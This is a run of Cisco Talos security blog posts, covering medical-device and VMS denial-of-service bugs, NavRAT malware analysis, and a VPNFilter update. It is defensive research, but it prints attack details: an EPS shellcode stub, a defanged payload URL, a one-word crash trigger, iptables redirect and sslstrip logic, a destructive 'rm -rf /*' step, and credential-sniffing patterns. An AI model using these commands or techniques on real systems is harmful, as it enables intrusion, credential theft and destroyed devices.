Vulnerability Spotlight: Natus NeuroWorks Multiple Vulnerabilites

May 31, 2018, 12:34 pm

≫ Next: NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea

≪ Previous: Beers with Talos EP 30 - VPNFilter, the Unfiltered Story

Vulnerabilities discovered by Cory Duplantis from Talos

Overview

In April 2018, Talos published 5 vulnerabilities in Natus NeuroWorks software. We have also identified 3 additional vulnerabilities. This software is used in the Natus Xltek EEG medical products from Natus Medical Inc. The vulnerable devices contain an ethernet connection for data acquisition and connection to networks. The vulnerabilities exposed here can cause the affected service to crash. The vulnerabilities can be triggered remotely without authentication.

We strongly recommend readers to refer to the "Discussion" part of the previous article in order to clearly understand the risk of vulnerabilities targeting health devices. Natus has released Neuroworks 8.5 GMA3 to address these issues. Talos recommends installing this update as quickly as possible on affected systems.

Details

Denials Of Service

TALOS-2017-0354 (CVE-2017-2853) - Natus Xltek EEG NeuroWorks ItemList Deserialization Denial of Service Vulnerability

Upon reception of data, the application attempts to unserialize the passed data. It recognizes a variety of data types, two of which are a string and an itemlist. The header of the sent data contains the length of an itemlist; by sending an invalid length the application will crash, resulting in a denial of service.

More details can be found in the vulnerability report:

TALOS-2017-0354

TALOS-2017-0362 (CVE-2017-2858) - Natus Xltek EEG NeuroWorks ItemList Traversal Denial of Service Vulnerability

Similar to the previous vulnerability, the application attempts on receipt of data to unserialize the data passed to it. If this data contains an empty itemlist, it will cause an access violation resulting in a denial of service in the application.

More details can be found in the vulnerability report:

TALOS-2017-0362

TALOS-2017-0364 (CVE-2017-2860) - Natus Xltek EEG NeuroWorks Invalid KeyTree Entry Denial of Service Vulnerability

NeuroWorks handles a specific data structure named KeyTree. A KeyTree is a list of lists. The application assumes that the first element of a KeyTree is an ItemList. However, if the first element is a String data structure, a pointer can point to an invalid memory address, resulting in a denial of service condition.

More details can be found in the vulnerability report:

TALOS-2017-0364

Tested Versions:

Natus Xltek NeuroWorks 8

Coverage

The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rules: 43150,43192

↧

NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea

May 31, 2018, 4:00 pm

≫ Next: Vulnerability Spotlight: TALOS-2018-0535 - Ocularis Recorder VMS_VA Denial of Service Vulnerability

≪ Previous: Vulnerability Spotlight: Natus NeuroWorks Multiple Vulnerabilites

This blog post is authored by Warren Mercer and Paul Rascagneres with contributions from Jungsoo An.

Executive Summary

Talos has discovered a new malicious Hangul Word Processor (HWP) document targeting Korean users. If a malicious document is opened, a remote access trojan that we're calling "NavRAT" is downloaded, which can perform various actions on the victim machine, including command execution, and has keylogging capabilities.

The decoy document is named "미북 정상회담 전망 및 대비.hwp" (Prospects for US-North Korea Summit.hwp). The HWP file format is mainly used in South Korea. An Encapsulated PostScript (EPS) object is embedded within the document in order to execute malicious shellcode on the victim systems. The purpose is to download and execute an additional payload hosted on a compromised website: NavRAT.

This is a classic RAT that can download, upload, execute commands on the victim host and, finally, perform keylogging. However, the command and control (C2) infrastructure is very specific. It uses the legitimate Naver email platform in order to communicate with the attackers via email. The uploaded file(s) are sent by email, and the downloaded files are retrieved from an email attachment. We have already observed malware using free email platforms for abuse, but this is the first time we have identified a malware that uses Naver — which is known for its popularity in South Korea.

One of the most interesting questions we still have is regarding attribution — and who is behind this malware. Previously, we published several articles concerning Group123 (here, here, here, here and here). We currently assess with medium confidence that this campaign and NavRAT are linked to Group123.

Malicious Document

Decoy Document

The attack starts with a spear-phishing email containing the HWP document named "미북 정상회담 전망 및 대비.hwp" (Prospects for US-North Korea Summit .hwp). This references a legitimate event that could potentially take place on June 12. Here is a screenshot of the document:

This document explains concerns prior to the summit between the U.S. and North Korea, which is expected to focus on the topic of denuclearization. The summit is the latest in a line of signs of diplomatic outreach from North Korea, following the Panmunjom Declaration for Peace, Prosperity and Unification of the Korean Peninsula between South Korea and North Korea on April 27, 2018.

This document contains the aforementioned EPS object. This object is used to execute malicious shellcode on the system. This is a seemingly common vector for attackers when using HWP documents, which we have previously encountered and described.

Malicious Code

As we already mentioned in our previous articles concerning malicious documents, EPS is effective from an attacker's point of view. It is a powerful, stack-based scripting language, and in malicious use cases, can be abused to obtain additional payloads. Here is the content of the file:

/shellcode <90909090909090909090E800<...redacted…>4D2D6DC95CBD5DC1811111111111111> def
<7B0D0A2756...redacted…>312067657420636C6F736566696C650D0A717569740D0A7D>
token pop exch pop
Exec

The executed shellcode will first perform a decoding routine designed to download an additional payload from the internet. In our case, the file URI was:

hxxp://artndesign2[.]cafe24[.]com:80/skin_board/s_build_cafeblog/exp_include/img.png

This website is a legitimate Korean website. We assume that this website was compromised in order to deliver the final payload on the targeted systems. This is a method we have previously observed with attacks focusing on the Korean peninsula.

The image is downloaded directly, and the shellcode is loaded and executed in memory. This is an example of fileless execution by only running malicious processes within the memory of the victim host. The purpose is to drop and execute a decoded executable using the following path:

%APPDATA%\Local\Temp\~emp.exe

Once executed, NavRAT will immediately leverage cmd.exe to perform a systeminfo and a tasklist check on the system it is running on while writing the output to a TMP file, once again attempting to hide within an AhnLab folder. Interestingly, the attacker has used the >> method to append to the file so there can be multiple outputs written to their single TMP file:

"C:\Windows\system32\cmd.exe" /C systeminfo >> "C:\Ahnlab\$$$A24F.TMP"

"C:\WINDOWS\system32\cmd.exe" /C tasklist /v >> "C:\Ahnlab\$$$A24F.TMP"

NavRAT

Capabilities

NavRAT is a remote access trojan (RAT) designed to upload, download and execute files. The analysed sample contains many verbose logs. The malware's author logs every action to a file (encoded). It's not often we are able to use the attacker's own logging capability to facilitate analysis, which can make our research easier.

This screenshot shows the logs messages during the process injection with the API usage.

NavRAT starts by copying itself (~emp.exe) to the %ProgramData%\Ahnlab\GoogleUpdate.exe path. It uses the path of a well-known security company located in South Korea named Ahn L ab. NavRAT then creates a registry key in order to execute this file copy at the next reboot of the system, an initial method of persistence. The log files mentioned previously are stored in the same directory as NavRAT on the victim machine, again making it easy for us to find and analyse the additional log files.

NavRAT has support for process injection. By using this method, it will copy itself into a running Internet Explorer process in order to avoid detection by running as an independent process. The malware is able to register the keystrokes on the targeted user's system:

The most interesting part of this RAT is the C2 server architecture. The malware uses the Naver email platform in order to communicate with the operators.

Command & Control

The malware communicates with the Naver email platform in order to communicate with the operator. The credentials are hardcoded in the sample:

However, during our investigation, NavRAT was unable to communicate with the email address:

[05/30/2018, 17:39:45]  NaverUpload Start!!
[05/30/2018, 17:39:46]  NaverUpload :PreUploading success
[05/30/2018, 17:39:46]   uploading step-1 : HttpSendRequest failed. Err[12150]
[05/30/2018, 17:39:46]  ////////////// Response Headers getting failure //////////
[05/30/2018, 17:39:46]  NaverUpload :Uploading failed. Try[0]
[05/30/2018, 17:39:47]   uploading step-1 : HttpSendRequest failed. Err[12150]
[05/30/2018, 17:39:47]  ////////////// Response Headers getting failure //////////
[05/30/2018, 17:39:47]  NaverUpload :Uploading failed. Try[1]
[05/30/2018, 17:39:48]   uploading step-1 : HttpSendRequest failed. Err[12150]
[05/30/2018, 17:39:48]  ////////////// Response Headers getting failure //////////
[05/30/2018, 17:39:48]  NaverUpload :Uploading failed. Try[2]
[05/30/2018, 17:39:49]   uploading step-1 : HttpSendRequest failed. Err[12150]
[05/30/2018, 17:39:49]  ////////////// Response Headers getting failure //////////
[05/30/2018, 17:39:49]  NaverUpload :Uploading failed. Try[3]
[05/30/2018, 17:39:51]   uploading step-1 : HttpSendRequest failed. Err[12150]
[05/30/2018, 17:39:51]  ////////////// Response Headers getting failure //////////
[05/30/2018, 17:39:51]  NaverUpload :Uploading failed. Try[4]
[05/30/2018, 17:39:52]  UploadProc : UploadFile Err
[05/30/2018, 17:39:52]  PreCommProc : UploadProc failed

The broken communication was due to protection implemented by Naver. The malware was presumably executed from too many different countries, and the account is currently locked:

The password must be reset by providing information on the account, or with a mobile phone of the owner (the phone number is located in the UK). In its current status, NavRAT cannot work correctly. We assume that the owner of the malware didn't know that Naver implemented this protection.

NavRAT is able to download and execute files located in the attachment of a received email. It is able to remove emails, and finally, it is able to send an email via the Naver account. In our sample, the data is attempted to be sent to: chioekang59@daum[.]net.

Archeology

During our investigation, we tried to find additional samples of NavRAT. We only identified one old sample compiled in May 2016. As in our case, this old sample used a fake AhnLab directory to store logs files (C:\AhnLab\). In this version, the compilation path was not removed:

N:\CodeProject\VC_Code Project\Attack_Spy\mailacounts.com\src_total_20160430 - v10.0(DIV)\bin\PrecomExe(Win32).pdb

We can conclude that NavRAT has probably existed since 2016 — which we believe to be version 10 at the time. The attacker(s) appear to have remained under the radar for several years. We assume this malware has been sparingly used and only for very specific targets.

Group123 Links?

As we explore the Korean malware landscape, we always have burning questions relating to any possible links with Group123. We identified some relevant points which we believe with medium confidence suggests the involvement of Group123 based on previous TTPs used by this group.

The modus operandi is identical to previous Group123 campaigns — a HWP document with embedded EPS object containing malicious shellcode. The shellcode of the embedded object is designed to download an image, which is, in fact, a new shellcode used to decode an embedded executable. We saw this exact same methodology used by Group123 during previous attacks. One such example is ROKRAT, another remote access trojan we discovered in April 2017 that targeted the Korean peninsula.

The shellcode used in the EPS object is not exactly the same, but it contains a lot of similarities right down to the number of instructions used, the amount of NOP (No Operations) and almost identical command layout. (On the left is NavRAT, and on the right is the shellcode of ROKRAT):

We performed the same analysis for the shellcode located in the downloaded image file and the shellcode is not exactly the same, but the design is very similar.

Additionally, we can add the victimology and usage of a public cloud platform as C2 server. The attacker simply moved from Yandex, Pcloud, Mediafire, Twitter, and now they are using Naver. This platform is mainly used locally in South Korea. A connection to this platform cannot be identified as a malicious activity. The malicious traffic will be hidden in the global flow.

Due to all these elements, we asses with medium confidence that NavRAT and this campaign can be linked to Group123. The malware developer is probably a different person within Group123's working team, but the infection framework and the operating mode are the same. When Talos published on Olympic Destroyer we were able to see a lot of false flags used. When we look at NavRAT we do not see this intentional and less vague level of IOC/False Flag scenarios in an attempt to infer attribution to another entity. NavRAT lacks these non-obvious false flags and thus we do not believe this to be related to non Group123 actors.

Conclusion

South Korea is still, and always will remain, an attractive target for advanced actors. The region has geopolitical interests that arise from the segregations that exist between the secretive North Korea and the more open South Korea. In this campaign, the attackers used a classical HWP document in order to download and execute a previously unknown malware: NavRAT. The author used real events in order to forge the decoy document. It chose the U.S. - North Korea Summit to entice the targets to open it.

The approach is close to the techniques used by Group123 attacks we have observed and written about over the past 18 months or so: the shellcode contains similarities, the final payload is malicious shellcode located in an image hosted on a compromised website, and the author uses an open platform as the C2 server. In this case, NavRAT used an email provider: Naver, while ROKRAT previously used cloud providers. And finally, the victimology and the targeted region are the same. All these elements are not strict proof of a link between NavRAT and ROKRAT. However, we asses with medium confidence that NavRAT is linked to Group123.

Using well-known local cloud/email providers is smart from an attacker's point of view. It's really hard to identify the malicious traffic in the middle of the legitimate traffic. In this case, the email provider locked the account due to attempts from too many different countries to access the email inbox. We identified the sample on several public sandbox systems, and we assume the multiple connection attempts were performed by these sandboxes.

Coverage

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as NGFW,NGIPS, and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open-source Snort subscriber rule set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

Malicious HWP: e5f191531bc1c674ea74f8885449f4d934d5f1aa7fd3aaa283fe70f9402b9574

NavRAT: 4f06eaed3dd67ce31e7c8258741cf727964bd271c3590ded828ad7ba8d04ee57

Online Payload: hxxp://artndesign2[.]cafe24[.]com:80/skin_board/s_build_cafeblog/exp_include/img.png

2016 NavRAT sample:

e0257d187be69b9bee0a731437bf050d56d213b50a6fd29dd6664e7969f286ef

↧

Vulnerability Spotlight: TALOS-2018-0535 - Ocularis Recorder VMS_VA Denial of Service Vulnerability

June 4, 2018, 9:53 pm

≫ Next: Talos Threat Research Summit Guide and Cisco Live Preview

≪ Previous: NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea

Vulnerabilities discovered by Carlos Pacho from Talos

Overview

Talos is disclosing a denial-of-service vulnerability in the Ocularis Recorder. Ocularis is a video management software (VMS) platform used in a variety of settings, from convenience stores, to city-wide deployments. An attacker can trigger this vulnerability by crafting a malicious network packet that causes a process to terminate, resulting in a denial of service.

Details

An exploitable denial-of-service vulnerability exists in the Ocularis Recorder functionality of Ocularis 5.5.0.242. A specially crafted TCP packet can cause a process to terminate, resulting in denial of service.

The VMS_VA server process is listening for incoming TCP connections on a port in the range of 60801-65535. When a client connects to it and sends any unexpected data, the binary will respond with "Hello World!" The binary has a check to see if the receiving data starts with "dispose.” If it does, the server process kills itself. There is no authentication required for this command to go through. Any attacker with network access to the server application can use this to execute a denial-of-service attack.

Ocularis has released patches for versions 5.3, 5.4 and 5.5 (https://onssi.com/software-downloads/)

More technical details can be found in the Talos Vulnerability Reports.

Coverage

The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rule: 45829

↧

Talos Threat Research Summit Guide and Cisco Live Preview

June 5, 2018, 7:54 pm

≫ Next: VPNFilter Update - VPNFilter exploits endpoints, targets new devices

≪ Previous: Vulnerability Spotlight: TALOS-2018-0535 - Ocularis Recorder VMS_VA Denial of Service Vulnerability

The first Cisco Talos Threat Research Summit is coming up at Cisco Live! in Orlando, so we are providing a quick guide to all the activities going on at the summit and beyond. The response to the summit was stronger than we could have anticipated for the first year - it sold out fast! Next time, we definitely need a bigger boat. Whether or not you have a ticket to the summit, read on for a guide of how to stay on top of what's happening in Orlando, and how you can connect with the events Talos is holding around Cisco Live! 2018.

Talos Threat Research Summit (Sold Out!)

Sunday, June 10, 7 a.m. - 7:30 p.m. ET

The Talos Threat Research Summit is designed by defenders, for defenders. It is focused on practical defensive security research and techniques. The emphasis is strongly on giving defenders actionable information, tactics, and intel they can take back to their organization and put to work immediately. In the modern threat landscape, better defense is no longer a wish-list item. Attacks are no longer "if" but "when," and in some environments, "how many times today?" The content selected for the Talos Threat Research Summit was curated to not only bolster knowledge but to facilitate opportunities for defenders to build relationships with their peers, which can be a defender's most powerful resource.

Agenda and Session Info

Agenda and speakers are available on the Talos Threat Research Summit event page (cs.co/TTRS18).

Social Channels

You will find highlights, quotes, and other content being tweeted directly from the summit across @TalosSecurity, @CiscoSecurity, and other Twitter accounts. Follow the #TTRS and #CLUS hashtags to catch all the conversation. Sessions will not be streamed, but content will be made available to attendees on the Cisco Live! content portal.

Reception

After the Talos Threat Research Summit, attendees will have the opportunity to network with each other and Talos team members in attendance.

Cisco Live Session -Talos Insights: The State of Cyber Security (BRKSEC-2010)

Thursday, June 14, 1 - 2:30 p.m. ET

Craig Williams, Director Talos Outreach, Cisco — Distinguished Speaker

Cisco Talos specializes in early-warning intelligence and threat analysis necessary for maintaining a secure network. People responsible for defending networks realize that the security threat landscape is constantly in flux as attackers evolve their skills. Talos advances the overall efficacy of all Cisco security platforms by aggregating data, cooperating with teams of security experts, and applying the cutting-edge big data technology to security. In this talk, we will perform a deep analysis of recent threats and see how Talos leverages large datasets to deliver improvements to products and mitigation strategies.

Beers with Talos @Live!

Tuesday, June 12, 4 - 6 p.m. ET

Join us at the CiscoTV set on the second floor balcony overlooking the main entrance and conference hall. We will be recording a special session of the Beers with Talos podcast, and you can watch us go without the benefit of editing! Stop by while the crew is recording - the first person hit Craig with Snorty wins a t-shirt!

Other Fun Stuff at Cisco Live!

The Hunting Game

Monday, June 11 - Thursday, June 14, all-day

The Hunting Game debuted at Cisco Live! Melbourne earlier this year and it was a big hit. Players are in the role of incident responders. Using Cisco kit and old-fashioned logic, they have one hour to assess and respond to the incident and to prevent future attacks. The game is designed for beginners and pros alike. For info and locations, see the Hunting Game post on the Cisco Security blog.

↧

VPNFilter Update - VPNFilter exploits endpoints, targets new devices

June 6, 2018, 6:02 am

≫ Next: Microsoft Patch Tuesday - June 2018

≪ Previous: Talos Threat Research Summit Guide and Cisco Live Preview

Introduction

Cisco Talos, while working with our various intelligence partners, has discovered additional details regarding "VPNFilter." In the days since we first published our findings on the campaign, we have seen that VPNFilter is targeting more makes/models of devices than initially thought, and has additional capabilities, including the ability to deliver exploits to endpoints. Talos recently published a blog about a broad campaign that delivered VPNFilter to small home-office network devices, as well as network-attached storage devices. As we stated in that post, our research into this threat was, and is, ongoing. In the wake of that post, we have had a number of partners step forward with additional information that has assisted us in our work. This post is an update of our findings over the past week.

First, we have determined that additional devices are being targeted by this actor, including some from vendors that are new to the target list. These new vendors are ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE. New devices were also discovered from Linksys, MikroTik, Netgear, and TP-Link. Our research currently shows that no Cisco network devices are affected. We've provided an updated device list below.

We have also discovered a new stage 3 module that injects malicious content into web traffic as it passes through a network device. At the time of our initial posting, we did not have all of the information regarding the suspected stage 3 modules. The new module allows the actor to deliver exploits to endpoints via a man-in-the-middle capability (e.g. they can intercept network traffic and inject malicious code into it without the user's knowledge). With this new finding, we can confirm that the threat goes beyond what the actor could do on the network device itself, and extends the threat into the networks that a compromised network device supports. We provide technical details on this module, named "ssler" below.

Additionally, we've discovered an additional stage 3 module that provides any stage 2 module that lacks the kill command the capability to disable the device. When executed, this module specifically removes traces of the VPNFilter malware from the device and then renders the device unusable. Analysis of this module, called "dstr," is also provided below.

Finally, we've conducted further research into the stage 3 packet sniffer, including in-depth analysis of how it looks for Modbus traffic.

Technical details

New third-stage modules

'ssler' (Endpoint exploitation module — JavaScript injection)

The ssler module, which we pronounce as "Esler," provides data exfiltration and JavaScript injection capabilities by intercepting all traffic passing through the device destined for port 80. This module is expected to be executed with a parameter list, which determines the module's behavior and which websites should be targeted. The first positional parameter controls the folder on the device where stolen data should be stored. The purpose of the other named parameters are as follows:

dst: — Used by the iptables rules created to specify a destination IP address or CIDR range that the rule should apply to.
src: — Used by the iptables rules created to specify a source IP address or CIDR range that the rule should apply to.
dump: — Any domain passed in a dump parameter will have all of its HTTP headers recorded in the reps_*.bin file.
site: — When a domain is provided in the "site" parameter, this domain will have its web pages targeted for JavaScript injection.
hook: — This parameter determines the URL of the JavaScript file for injection.

The first action taken by the ssler module is to configure the device's iptables to redirect all traffic destined for port 80 to its local service listening on port 8888. It starts by using the insmod command to insert three iptables modules into the kernel (ip_tables.ko, iptable_filter.ko, iptable_nat.ko) and then executes the following shell commands:

iptables -I INPUT -p tcp --dport 8888 -j ACCEPT
iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8888
Example: ./ssler logs src:192.168.201.0/24 dst:10.0.0.0/16

-A PREROUTING -s 192.168.201.0/24 -d 10.0.0.0/16 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8888

Note: To ensure that these rules do not get removed, ssler deletes them and then adds them back approximately every four minutes.

Any outgoing web requests on port 80 are now intercepted by ssler and can be inspected and manipulated before being sent to the legitimate HTTP service. All HTTP requests are sslstripped. That is, the following changes are made to requests before being sent to the true HTTP server:

Any instances of the string https:// are replaced with http://, converting requests for secure HTTP resources to requests for insecure ones so sensitive data such as credentials can be extracted from them.
If the request contains the header Connection: keep-alive, it is replaced with Connection: close
If the request contains the header Accept-Encoding with the gzip value, this is converted to Accept-Encoding: plaintext/none so no responses will be compressed with gzip (exceptions are made for certain file types, such as images).

If the host is in one of the dump: parameters, the details of the request are saved to the disk for exfiltration, including the URL, port and all of the request headers. If the host is not in a dump: parameter, it will only dump requests with an Authorization header or URLs that have credentials in them. URLs are determined to have credentials if they contain either the string assword= or ass= and one of the following strings in them:

sername=
ser=
ame=
ogin=
ail=
hone=
session%5Busername
session%5Bpassword
session[password

Any POST requests to accounts.google.com containing the string signin will also be dumped.

After these modifications are made, a connection to the true HTTP server is made by ssler using the modified request data over port 80. Ssler receives the response from the HTTP server and makes the following changes to the response before passing it on to the victim:

A response with an https:// in its Location header value is converted to http://
The following headers are ignored, i.e. not sent to the client:

Alt-Scv
Vary
Content-MD5
content-security-policy
X-FB-Debug
public-key-pins-report-only
Access-Control-Allow-Origin

The entire response is sslstripped — that is, all instances of https:// with \x20http://.
If parameter site: is provided a domain (or part of a domain, e.g. "google"), it will attempt to inject JavaScript into all Content-Type: text/html or Content-Type: text/javascript responses. The requirement is that the string <meta name= … > be present and long enough to fit the string from the hook: parameter. The <meta name= … > tag will be replaced with <script type="text/javascript" src="[hook value]">. The victim IP combined with the site is then added to an internal whitelist in ssler and will not be targeted for injection again until the whitelist is cleared (which occurs every four days).

Each domain that is sslstripped in the responses (e.g. domains found in links) is then added to a list of stripped domains. Subsequent requests that are intercepted by the ssler module to domains in this list will occur via HTTPS over port 443, instead of HTTP over port 80. By default, four domains are on this list, so ssler will always connect to these domains via HTTPS over port 443: www.google.com, twitter.com, www.facebook.com, or www.youtube.com.

'dstr' (device destruction module)

The dstr modules are used to render an infected device inoperable by deleting files necessary for normal operation. It deletes all files and folders related to its own operation first before deleting the rest of the files on the system, possibly in an attempt to hide its presence during a forensic analysis.

The x86 version of the dstr module was analyzed in-depth. This module first deleted itself from the disk and then stops the execution of the parent Stage 2 process. It will then search all running process for ones named vpnfilter, security, and tor and terminate them. Next, it explicitly deletes the following files and directories:

/var/tmp/client_ca.crt
/var/tmp/client.key
/var/tmp/client.crt
/var/run/vpnfilterm/htpx
/var/run/vpnfilter
/var/run/vpn.tmp
/var/run/vpn.pid
/var/run/torrc
/var/run/tord/hidden_ssh/private_key
/var/run/tord/hidden_ssh/hostname
/var/run/tor
/var/run/msvf.pid
/var/run/client_ca.crt
/var/run/client.key
/var/run/client.crt
/var/pckg/mikrotik.o
/var/pckg/.mikrotik.
/var/msvf.pid
/var/client_ca.crt
/var/client.key
/var/client.crt
/tmp/client_ca.crt
/tmp/client.key
/tmp/client.crt
/flash/nova/etc/loader/init.x3
/flash/nova/etc/init/security
/flash/nova/etc/devel-login
/flash/mikrotik.o
/flash/.mikrotik.
/var/run/vpnfilterw/
/var/run/vpnfilterm/
/var/run/tord/hidden_ssh/
/var/run/tord/
/flash/nova/etc/loader/
/flash/nova/etc/init/

The dstr module clears flash memory by overwriting the bytes of all available /dev/mtdX devices with a 0xFF byte. Finally, the shell command rm -rf /* is executed to delete the remainder of the file system and the device is rebooted. At this point, the device will not have any of the files it needs to operate and fail to boot.

Additional research on the third stage packet sniffer

'ps' (stage 3 packet sniffer)

One of stage 3 packet sniffer module samples we have is the R600VPN MIPS-like (Lexra architecture) sample. This sample is a packet sniffer that is looking for basic authentication as well as monitoring ICS traffic, and is specific to the TP-LINK R600-VPN. The malware uses a raw socket to look for connections to a pre-specified IP address, only looking at TCP packets that are 150 bytes or larger (note: This is the full packet size, with headers. Depending on the size of the TCP header, the PDU could be approximately 56 to 96 bytes and still meet the criteria to get logged). It has the ability to view, but not modify, the network traffic. Very significant changes would be required to implement functionality that could modify traffic.

Packets that are not on port 502, are scanned for BasicAuth, and that information is logged.

Else: (non-Modbus traffic): sniffing HTTP basic auth credentials

Destination IP Address == command line argument IP address
Source port > 1024
Source port != 8080
Source port != 8088
Packet Data length > 20 bytes
Packet does not contain

</ and >
<?xml
Basic Og==
/tmUnblock.cgi
Password Required
<div
<form
<input
this. and .get
{
}
200 OK
<span
<SPAN
<DIV

Packet contains 'Authorization: Basic' OR one user/pass combination

User

User=
user=
Name=
name=
Usr=
usr=
Login=
login=

Pass

Pass=
pass=
Password=
password=
Passwd=
passwd=

Logging: Logs on IPs and ports, but not the packet contents on port 502. It does not validate the traffic as Modbus.

Modbus - Logs SourceIP, SourcePort, DestinationIP, DestinationPort and labels it *modbus*
All Other - write full packet to log file if and only if it passes basic auth check

Conclusion

These new discoveries have shown us that the threat from VPNFilter continues to grow. In addition to the broader threat surface found with additional targeted devices and vendors, the discovery of the malware's capability to support the exploitation of endpoint devices expands the scope of this threat beyond the devices themselves, and into the networks those devices support. If successful, the actor would be able to deploy any desired additional capability into the environment to support their goals, including rootkits, exfiltration capability and destructive malware.

Talos would like to thank all of the individual researchers, companies and intelligence partners from around the world who have stepped forward to share information and address this threat. Your actions have helped us gain a greater understanding of this campaign, and in some cases, have directly improved the situation. We recognize this is a team sport, and truly appreciate your assistance.

We will continue to monitor VPNFilter and work with our partners to understand the threat as it continues to evolve in order to ensure that our customers remain protected and the public is informed.

Updated List of IOCs

As stated previously, we highly suspect that there are additional IOCs and versions of this malware that we are not currently aware of. The following list of IOCs comprises what we know as of this date. News IOCs are in BOLD below.

Known C2 Domains and IPs

Associated with the 1st Stage

photobucket[.]com/user/nikkireed11/library
photobucket[.]com/user/kmila302/library
photobucket[.]com/user/lisabraun87/library
photobucket[.]com/user/eva_green1/library
photobucket[.]com/user/monicabelci4/library
photobucket[.]com/user/katyperry45/library
photobucket[.]com/user/saragray1/library
photobucket[.]com/user/millerfred/library
photobucket[.]com/user/jeniferaniston1/library
photobucket[.]com/user/amandaseyfried1/library
photobucket[.]com/user/suwe8/library
photobucket[.]com/user/bob7301/library
toknowall[.]com

Associated with the 2nd Stage

91.121.109[.]209
217.12.202[.]40
94.242.222[.]68
82.118.242[.]124
46.151.209[.]33
217.79.179[.]14
91.214.203[.]144
95.211.198[.]231
195.154.180[.]60
5.149.250[.]54
94.185.80[.]82
62.210.180[.]229
91.200.13[.]76
23.111.177[.]114

6b57dcnonk2edf5a[.]onion/bin32/update.php
tljmmy4vmkqbdof4[.]onion/bin32/update.php
zuh3vcyskd4gipkm[.]onion/bin32/update.php
4seiwn2ur4f65zo4.onion/bin256/update.php
zm3lznxn27wtzkwa.onion/bin16/update.php

Known File Hashes

1st Stage Malware

50ac4fcd3fbc8abcaa766449841b3a0a684b3e217fc40935f1ac22c34c58a9ec
0e0094d9bd396a6594da8e21911a3982cd737b445f591581560d766755097d92
b9770ec366271dacdae8f5088218f65a6c0dd82553dd93f41ede586353986124
51e92ba8dac0f93fc755cb98979d066234260eafc7654088c5be320f431a34fa
6a76e3e98775b1d86b037b5ee291ccfcffb5a98f66319175f4b54b6c36d2f2bf
313d29f490619e796057d50ba8f1d4b0b73d4d4c6391cf35baaaace71ea9ac37

2nd Stage Malware

9683b04123d7e9fe4c8c26c69b09c2233f7e1440f828837422ce330040782d17
d6097e942dd0fdc1fb28ec1814780e6ecc169ec6d24f9954e71954eedbc4c70e
4b03288e9e44d214426a02327223b5e516b1ea29ce72fa25a2fcef9aa65c4b0b
9eb6c779dbad1b717caa462d8e040852759436ed79cc2172692339bc62432387
37e29b0ea7a9b97597385a12f525e13c3a7d02ba4161a6946f2a7d978cc045b4
776cb9a7a9f5afbaffdd4dbd052c6420030b2c7c3058c1455e0a79df0e6f7a1d
8a20dc9538d639623878a3d3d18d88da8b635ea52e5e2d0c2cce4a8c5a703db1
0649fda8888d701eb2f91e6e0a05a2e2be714f564497c44a3813082ef8ff250b
2ffbe27983bc5c6178b2d447d8121cefaa5ffa87fe7b9e4f68272ce54787492f
1e741ec9452aab85a2f7d8682ef4e553cd74892e629012d903b521b21e3a15bf
90efcaeac13ef87620bcaaf2260a12895675c74d0820000b3cd152057125d802
eaf879370387a99e6339377a6149e289655236acc8de88324462dcd0f22383ff
081e72d96b750a38ef45e74d0176beb982905af4df6b8654ea81768be2f84497
24b3931e7d0f65f60bbb49e639b2a4c77de83648ff08e097ff0fa6a53f5c7102
4497af1407d33faa7b41de0c4d0741df439d2e44df1437d8e583737a07ec04a1
579b2e6290c1f7340795e42d57ba300f96aef035886e80f80cd5d0bb4626b5fc
eeb3981771e448b7b9536ba5d7cd70330402328a884443a899696a661e4e64e5
952f46c5618bf53305d22e0eae4be1be79329a78ad7ec34232f2708209b2517c
e70a8e8b0cd3c59cca8a886caa8b60efb652058f50cc9ff73a90bc55c0dc0866
5be57b589e5601683218bb89787463ca47ce3b283d8751820d30eee5e231678c
fe46a19803108381d2e8b5653cc5dce1581a234f91c555bbfff63b289b81a3dc
ae1353e8efe25b277f52decfab2d656541ffdf7fd10466d3a734658f1bc1187a
2ef0e5c66f6d46ddef62015ea786b2e2f5a96d94ab9350dd1073d746b6922859
181408e6ce1a215577c1daa195e0e7dea1fe9b785f9908b4d8e923a2a831fce8
2aa7bc9961b0478c552daa91976227cfa60c3d4bd8f051e3ca7415ceaeb604ca
375ededc5c20af22bdc381115d6a8ce2f80db88a5a92ebaa43c723a3d27fb0d6
0424167da27214cf2be0b04c8855b4cdb969f67998c6b8e719dd45b377e70353
7e5dca90985a9fac8f115eaacd8e198d1b06367e929597a3decd452aaa99864b
8de0f244d507b25370394ba158bd4c03a7f24c6627e42d9418fb992a06eb29d8
7ee215469a7886486a62fea8fa62d3907f59cf9bf5486a5fe3a0da96dabea3f9
ff70462cb3fc6ddd061fbd775bbc824569f1c09425877174d43f08be360b2b58
f5d06c52fe4ddca0ebc35fddbbc1f3a406bdaa5527ca831153b74f51c9f9d1b0
bc51836048158373e2b2f3cdb98dc3028290e8180a4e460129fef0d96133ea2e
d9a60a47e142ddd61f6c3324f302b35feeca684a71c09657ddb4901a715bd4c5
95840bd9a508ce6889d29b61084ec00649c9a19d44a29aedc86e2c34f30c8baf
3bbdf7019ed35412ce4b10b7621faf42acf604f91e5ee8a903eb58bde15688ff
9b455619b4cbfeb6496c1246ba9ce0e4ffa6736fd536a0f99686c7e185eb2e22
bfd028f78b546eda12c0d5d13f70ab27dff32b04df3291fd46814f486ba13693
a15b871fcb31c032b0e0661a2d3dd39664fa2d7982ff0dbc0796f3e9893aed9a
